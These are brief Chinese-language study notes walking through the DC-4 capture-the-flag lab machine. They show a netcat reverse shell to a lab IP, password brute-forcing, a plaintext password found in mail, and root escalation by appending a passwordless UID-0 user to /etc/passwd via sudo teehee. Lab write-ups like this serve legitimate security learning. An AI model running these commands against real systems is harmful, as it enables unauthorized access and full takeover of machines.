DC4
信息收集
内网探测
端口扫描
指纹识别
打开网站
我们从官方的手册上来看是爆破用户密码
登录之后
这个指令好想是可以命令执行的抓包看一下
漏洞利用
发现是可以命令执行的
我们尝试反弹shell
nc -lvp 8888
nc 192.168.189.139 8888 -e /bin/bash
拿到shell
启用python交互模式
python -c 'import pty;pty.spawn("/bin/bash")'
内网信息收集
然后我们先看看home目录下有几个用户
cd /home
有三个用户
第一个用户里面没有东西然后jim用户里面
有一个old密码我们先把这个保存下来看看有没有python
开启一个http服务然后wget下来
python3 -m http.server 7777
然后本地 wget ip:7777/文件名
这个密码文可能是jim的用户密码我们尝试爆破一下
ssh连接起来
里面有一个邮件我们看一下然后我们看看系统邮箱在哪
:::warning /var/spool/mail/ 这个就是系统邮箱的位置了
:::
这里是告诉了我们charles的密码猜测应该是ssh的密码切换用户试试 密码:^xHhA&hvim0y
提权
发现是有teehee提权的
teehee应该是一个类似于echo的东西然后我们可以通过这个teehee来将/etc/passwd中添加一个不需要密码就可以登录的用户并且具有root权限,
里面有七个字段然后
admin::0:0:::/bin/bash 我们可以将用户设置成这个格式这个格式的意思是用户是admin 无密码 0是root权限 0是group root一个组别然后 使用 /bin/bashshell
完整的命令
echo "kail::0:0:::/bin/bash" >>/etc/passwd
echo"admin::0:0:::/bin/bash"|sudo teehee -a /etc/passwd
输入到指定的文件中
然后 su admin切换用户
root权限了
flag
总结
总结一下叭
这里我们学到了,python 本地开启web服务,然后/etc/passwd的信息构造
然后systemctl start apache2开启web服务
然后就是teehee提权